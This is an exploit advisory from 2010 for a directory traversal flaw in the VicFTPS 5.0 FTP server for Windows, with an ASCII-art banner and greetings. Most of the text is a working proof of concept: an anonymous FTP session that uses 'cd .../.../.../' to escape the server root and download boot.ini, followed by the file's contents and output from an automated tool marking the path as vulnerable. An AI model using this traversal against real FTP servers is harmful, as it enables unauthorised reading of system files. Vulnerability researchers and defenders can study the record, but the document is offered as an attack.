################################################################################
#
# +------------------------------------------------------------------------+
# | .......|
# | ..''xxxxxxxxxxxxxxx'...|
# |..'xxxxxxxxxxxxxxxxxxxxxxxxxxx..|
# | ..'xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx'. |
# | .'xxxxxxxxxxxxxxxxxxxxxxxxxxxx'''.......'. |
# | .'xxxxxxxxxxxxxxxxxxxxx''........... |
# |.xxxxxxxxxxxxxxxxxx'... .........'. |
# | 'xxxxxxxxxxxxxxx'......'.|
# |'xxxxxxxxxxxxxx'..'x...x. |
# | .xxxxxxxxxxxx'...'..... .' |
# | 'xxxxxxxxx'......x.|
# | xxxxxxx'...x.|
# | xxxx'.....xx.|
# | 'x'....'xxxxxxx'. x .x.|
# | .x'. .'xxxxxxxxxxxxxx. '' .' |
# |.xx..'xxxxxxxxxxxxxxxx. .'xx'''..'|
# | .xx..'xxxxxxxxxxxxxxxx'.'xxxxxxxxx''.|
# |.'xx'..'xxxxxxxxxxxxxxx...'xxxxxxxxxxxx'|
# |.xxx'..xxxxxxxxxxxx'..'xxxxxxxxxxxxxx'. |
# |.xxxx'.'xxxxxxxxx'.xxx'xxxxxxxxxx'. |
# |.'xxxxxxx'.......xxxxxxx'.|
# | ..'xxxxx'.. ..xxxxx'.. |
# |....'xx'.....''''...|
# ||
# |CubilFelino Security Research Labs|
# |proudly presents... |
# +------------------------------------------------------------------------+
#
# VicFTPS v5.0 Directory Traversal
#
#
# Greets: l1l1th, hkm, nitr0us, alt3kx, r1l0, b0rr3x, w01f, ax0us
# gh0st, CHiP, Jorge Mieres and ygjb.
#
################################################################################
# Exploit Title: VicFTPS v5.0 Directory Traversal
# Date: May 05, 2010
# Author: chr1x
# Description: A simple FTP server for Windows. Does not require an install. Very simple to configure. Supports only one user connection at a time. Supports active and passive mode transfers, MDTM, SIZE, and PASS. Version 5.0 fixed CWD Buffer overflow vulnerability. <- A new vuln here! :D
# Version: 5.0
# Tested on: Windows XP SP3 (Spanish Edition)
#########<VULN CONFIRMATION>#########################################
root@olovely:/ddpwn# ftp
ftp> open
(to) 192.168.1.64
Connected to 192.168.1.64.
220 VicFTPS ready
Name (192.168.1.64:ninja): anonymous
331 pretend login accepted
Password:
230 fake user logged in
Remote system type is WIN32.
ftp> ascii
200 Type set to I
ftp> cd .../.../.../
250 CWD command successful
ftp> pwd
257 "/../../"
ftp> get boot.ini
local: boot.ini remote: boot.ini
200 PORT command successful
150 Opening BINARY mode data connection
226 Transfer Complete
211 bytes received in 0.00 secs (92.1 kB/s)
ftp> bye
221 goodbye
root@olovely:/ddpwn# cat boot.ini
[boot loader]
timeout=30
default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS
[operating systems]
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /noexecute=optin /fastdetect
root@olovely:/ddpwn#
#########</VULN CONFIRMATION>#########################################
Shot from DDPwNv1.0
[*] Testing Path: .../.../.../<- VULNERABLE! :P
Thiz v00d00 t00l just r0x! Ninjutzu automated hacking babe! lol.
http://chr1x.sectester.net